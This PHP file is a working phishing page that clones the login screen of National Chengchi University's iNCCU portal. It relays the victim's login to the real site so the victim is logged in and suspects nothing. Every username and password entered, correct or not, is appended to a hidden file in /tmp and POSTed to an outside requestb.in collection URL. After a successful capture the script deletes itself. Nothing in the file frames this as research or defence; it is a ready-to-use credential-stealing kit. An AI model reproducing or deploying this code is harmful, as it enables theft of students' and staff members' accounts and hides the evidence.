index.php

<?php

$html_tpl = <<<END
<!DOCTYPE html>
<html lang="zh">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <title>登入「愛政大」校園個人化入口-Login iNCCU Portal
        0</title>
    <script src="https://i.nccu.edu.tw/js/jquery-1[1].3.2.min.js" type="text/javascript"></script>
    <link href="https://i.nccu.edu.tw/css/reset.css" rel="stylesheet" type="text/css">

    <link href='https://i.nccu.edu.tw/css/default_yellow_bubble.css' rel='stylesheet' type='text/css'><link href='https://i.nccu.edu.tw/css/color_red.css' rel='stylesheet' type='text/css'><link href='https://i.nccu.edu.tw/css/bottomimg_book.css' rel='stylesheet' type='text/css'>
    <!--[if lt IE 9]>
        <script src="https://i.nccu.edu.tw/js/html5shiv.js"></script>
        <script src="https://i.nccu.edu.tw/https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
    <!--[if (lt IE 10)&(!IEMobile)]>
        <link href="https://i.nccu.edu.tw/css/ie8.css" rel="stylesheet" type="text/css">
    <![endif]-->
    <!-- Picturefill.js , srcset,sizes !-->
    <script>
        // Picture element HTML5 shiv
        document.createElement("picture");
    </script>
    <!-- Picturefill.js , srcset,sizes !-->
    <script src="https://i.nccu.edu.tw/js/picturefill.min.js" async></script>
    <!-- Retina.js !-->
    <script type="text/javascript" src="https://i.nccu.edu.tw/js/retina.js"></script>
</head>
<body>


    <div id="ad">
        <!--立即體驗&gt;&gt;&gt;<a style="color: rgb(255, 255, 255);" href="https://i.nccu.edu.tw/http://sgnweb.nccu.edu.tw/mnccu/?utm_source=inccu&amp;utm_medium=right_banner" target="_blank">行動政大APP</a>!-->
        <a href="http://sgnweb.nccu.edu.tw/mnccu/" target="_blank">
            <picture>
                  <!--[if IE 9]><video style="display: none;"><![endif]-->
                  <source srcset="https://i.nccu.edu.tw/images/ad_course.png" media="(min-width:64em)">
                  <!--[if IE 9]></video><![endif]-->
                  <img srcset="https://i.nccu.edu.tw/images/ad_courseM.png" media="min-width:30em" alt="點此下載行動政大App">
              </picture>
        </a>
    </div>
    <div id="wrapper">
        <form name="form1" method="post" action="" id="form1">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEyOTYxMTUwNTkPZBYEZg8WAh4EVGV4dAXRATxsaW5rIGhyZWY9J2Nzcy9kZWZhdWx0X3llbGxvd19idWJibGUuY3NzJyByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJz48bGluayBocmVmPSdjc3MvY29sb3JfcmVkLmNzcycgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2Nzcyc+PGxpbmsgaHJlZj0nY3NzL2JvdHRvbWltZ19ib29rLmNzcycgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2Nzcyc+ZAIBD2QWCAIBDxYCHgZzcmNzZXQFIWltYWdlcy9sb2dpbl8yMDE1XzExX3JlZC9sb2dvLnBuZ2QCAw8WAh8BBSJpbWFnZXMvbG9naW5fMjAxNV8xMV9yZWQvbG9nb00ucG5nZAIFDxYCHwEFImltYWdlcy9sb2dpbl8yMDE1XzExX3JlZC9sb2dvUy5wbmdkAgsPZBYCAgMPDxYCHgdWaXNpYmxlaGQWAgIJDw8WAh8ABSzoq4vovLjlhaXlnKjkuIrlnJbkuK3poa/npLrkuYvmlbjlrZcoMH45KeOAgmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRdjYXB0Y2hhJExvZ2luMSRja2JMb2dpboqgqvXwArHBQL6TrKkaBgnlvzWl" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['form1'];
if (!theForm) {
    theForm = document.form1;
}
function __doPostBack(eventTarget, eventArgument) {
    if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
        theForm.__EVENTTARGET.value = eventTarget;
        theForm.__EVENTARGUMENT.value = eventArgument;
        theForm.submit();
    }
}
//]]>
</script>


<div>

    <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" />
</div>
        <header role="banner">
           <picture>
              <!--[if IE 9]><video style="display: none;"><![endif]-->
               <source id="logo1" srcset="https://i.nccu.edu.tw/images/login_2015_11_red/logo.png" media="(min-width:64em)"></source>
               <source id="logo2" srcset="https://i.nccu.edu.tw/images/login_2015_11_red/logoM.png" media="(min-width:48em)"></source>
              <!--[if IE 9]></video><![endif]-->
              <img id="logo3" srcset="https://i.nccu.edu.tw/images/login_2015_11_red/logoS.png" media="min-width:30em" alt="iNCCU愛政大" />
          </picture>
    </header>
        <nav role="navigation">
        <p>
            <span class="index">
                  <picture>
                    <!--[if IE 9]><video style="display: none;"><![endif]-->
                    <source srcset="https://i.nccu.edu.tw/images/nami/icon_index.png" media="(min-width:48em)">
                    <!--[if IE 9]></video><![endif]-->
                    <img srcset="https://i.nccu.edu.tw/images/nami/icon_indexM.png" media="min-width:30em" alt="icon">
                  </picture>
                  <a href="http://www.nccu.edu.tw/">
                    政大首頁
                  </a>
              </span>
              <span class="lang">
                  <picture>
                      <!--[if IE 9]><video style="display: none;"><![endif]-->
                      <source srcset="https://i.nccu.edu.tw/images/nami/icon_lang.png" media="(min-width:48em)">
                      <!--[if IE 9]></video><![endif]-->
                      <img srcset="https://i.nccu.edu.tw/images/nami/icon_langM.png" media="min-width:30em" alt="icon">
                  </picture>
                   <a id="languageChange" href="javascript:__doPostBack('languageChange','')">English</a>
              </span>
        </p>
    </nav>

<div id="login">
    <div id="systemname">

    </div>
    <div id="captcha" align="center">

    </div>
    <table id="captcha_Login1" cellspacing="0" cellpadding="0" border="0" style="width:100%%;border-collapse:collapse;">
    <tr>
        <td>
            <div style="font-size: small; color: Red; text-align: left;">
                %s
            </div>
            <div id="username">
                <span class="ie9ph">帳號：</span>
                <input name="captcha\$Login1\$UserName" type="text" id="captcha_Login1_UserName" type="text" placeholder="帳號/學號" />
                <p class="sWord">
                    @nccu.edu.tw</p>
            </div>
            <div id="password">
                <span class="ie9ph">密碼：</span>
                <input name="captcha\$Login1\$Password" type="password" maxlength="14" id="captcha_Login1_Password" type="password" placeholder="密碼" />
            </div>
            <div id="rememberUser">
                <label>
                    <input id="captcha_Login1_ckbLogin" type="checkbox" name="captcha\$Login1\$ckbLogin" />
                    <label for="captcha_Login1_ckbLogin">
                        <span class="ssWord">
                            記住我的帳號密碼</span></label>
                </label>
            </div>
            <div id="log">
                <a id="captcha_Login1_LoginButton" href="javascript:__doPostBack('captcha\$Login1\$LoginButton','')" style="text-decoration: none">登入</a>
            </div>
            <div id="help">
                <a href="http://schwebap.nccu.edu.tw/LdapEar/login.aspx">
                    建立帳戶
                </a><a class="wrong" href="http://ccweb.km.nccu.edu.tw/home/index.php?f=contentShow&id=315">
                    無法登入?
                </a>
            </div>
        </td>
    </tr>
</table>
</div>

        <footer>
        <p class="mWord">
            <a href="https://i.nccu.edu.tw/doc/index.html">
                了解更多
            </a>
            ｜
            <a href="http://ccweb.km.nccu.edu.tw/home/index.php?f=contentShow&amp;id=7990" target="_blank">
                誰可以登入
            </a>
        </p>
        <p>校內分機67599‧校外直撥(02)29387599</p>
        <p>校址：11605 台北市文山區指南路二段64號<br>
        ‧總機電話：02-29393091<br>
        ‧傳真：02-29379611</p>
    </footer>
        </form>
        <p>
            &nbsp;</p>
    </div>
    <!--/ div.wrapper !-->

    <div class="bottomimg">
    </div>


    </div>
</body>

<script language="javascript" type="text/javascript">
    \$('#captcha_Login1_UserName').focus();
    \$(document).keypress(function (e) {
        if (e.keyCode == 13) {
            var login = document.getElementById('captcha_Login1_LoginButton');
            window.location = login.href;
        }
    });
</script>
</html>
END;


if ($_SERVER['REQUEST_METHOD'] != 'POST') {
    printf($html_tpl, '');
    exit();
}

$username = $_POST['captcha$Login1$UserName'];
$password = $_POST['captcha$Login1$Password'];

$ckbLogin = null;
if (isset($_POST['captcha$Login1$ckbLogin'])) {
    $ckbLogin = $_POST['captcha$Login1$ckbLogin'];
}


$username = trim($username);
$password = trim($password);

if (strlen($username) == 0 || strlen($password) == 0) {
    printf($html_tpl, '您嘗試登入失敗，請再試一次。');
    exit();
}

function get_login_info(&$session_id, &$post_tpl) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://i.nccu.edu.tw/Login.aspx?ReturnUrl=%2fdefault.aspx');
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    $content = curl_exec($ch);

    preg_match('/Set-Cookie:\s*ASP.NET_SessionId=([^;]*?);/', $content, $matches);
    $session_id = $matches[1];
    // echo $session_id;
    $__EVENTTARGET = 'captcha%24Login1%24LoginButton';
    $__EVENTARGUMENT = '';
    preg_match('/id="__VIEWSTATE"\s*value="([^"]+)"/', $content, $matches);
    $__VIEWSTATE = $matches[1];

    preg_match('/id="__VIEWSTATEGENERATOR"\s*value="([^"]+)"/', $content, $matches);
    $__VIEWSTATEGENERATOR = $matches[1];

    $post_tpl = '__EVENTTARGET=%s&__EVENTARGUMENT=%s&__VIEWSTATE=%s&__VIEWSTATEGENERATOR=%s';
    $post_tpl = sprintf($post_tpl, $__EVENTTARGET, $__EVENTARGUMENT, urlencode($__VIEWSTATE), $__VIEWSTATEGENERATOR);
}


function login($username, $password, $ckbLogin=null) {
    get_login_info($session_id, $post_prefix);

    $post_fields = 'captcha%%24Login1%%24UserName=%s&captcha%%24Login1%%24Password=%s';
    $post_fields = sprintf($post_fields, urlencode($username), urlencode($password));

    if (!is_null($ckbLogin)) {
        $post_fields .= '&captcha%24Login1%24ckbLogin='.urlencode($ckbLogin);
    }

    $post_fields = $post_prefix . '&' . $post_fields;
    $cookie = 'ASP.NET_SessionId=' . $session_id . '; UiCulture=zh-TW';
    $header = array(
        'Content-Type: application/x-www-form-urlencoded',
        'Referer: https://i.nccu.edu.tw/Login.aspx?ReturnUrl=%2fHome.aspx'
    );

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://i.nccu.edu.tw/Login.aspx?ReturnUrl=%2fdefault.aspx');
    curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    // curl_setopt($ch, CURLOPT_HTTPHEADER, $header);

    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);

    // curl_setopt($ch, CURLOPT_VERBOSE, 1);
    $content = curl_exec($ch);

    preg_match('/Set-Cookie:\s*.LDAPAUTH=([^;]+)/', $content, $matches);

    if (count($matches) < 2) {
        return false;
    }

    $ldap_cookie = $matches[1];

    // ".LDAPAUTH=7F0790BC41C02B8FFA29878FD7715BC970BB5FA62A8B249465C2819E9F0B2DDC3A819B8F21765FBB1A69839067FFBC2E92C316D3C8B30BAF5BE36278036886C1DBAFB70BB144EDEDB02817F4971286FA0C662AF64E96A3B8574ADF0FA7DF9347F306C1FC3EA9E01063EBDCF1D9328ED10D6D692F; domain=nccu.edu.tw; path=/; secure; HttpOnly"
    setcookie('.LDAPAUTH', $ldap_cookie, 0, '/', 'nccu.edu.tw');
    setcookie('remember', 'F', 0, '/', 'nccu.edu.tw');
    setcookie('un', '', 0, '/', 'nccu.edu.tw');
    setcookie('au4a83', '', 0, '/', 'nccu.edu.tw');
    setcookie('cd', '', 0, '/', 'nccu.edu.tw');
    setcookie('ASP.NET_SessionId', $session_id, 0, '/', 'nccu.edu.tw');

    header('Location: https://i.nccu.edu.tw/ChkPwdStat.aspx?ReturnUrl=%2fdefault.aspx');

    return true;
}


if (!login($username, $password, $ckbLogin)) {
    printf($html_tpl, '您嘗試登入失敗，請再試一次。');
    $f = fopen('/tmp/.pass.txt', 'a');
    fwrite($f, '[ERROR] '.$username.':'.$password."\n");
    fclose($f);

    $body = ('[ERROR] '.$username.':'.$password);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://requestb.in/xv7djfxv');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    @curl_exec($ch);

} else {
    $f = fopen('/tmp/.pass.txt', 'a');
    fwrite($f, '[SUCCESS] '.$username.':'.$password."\n");
    fclose($f);

    $body = ('[SUCCESS] '.$username.':'.$password);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, 'https://requestb.in/xv7djfxv');
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
    @curl_exec($ch);

    @unlink('./index.php');
}